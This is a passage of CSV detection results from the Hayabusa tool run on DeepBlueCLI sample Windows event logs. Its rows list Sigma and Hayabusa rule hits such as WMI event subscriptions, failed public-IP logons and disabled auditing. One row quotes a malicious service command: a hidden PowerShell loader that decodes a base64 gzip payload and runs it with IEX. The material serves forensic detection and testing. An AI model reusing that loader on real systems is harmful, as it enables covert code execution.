Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
+2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other 
File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 
05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 
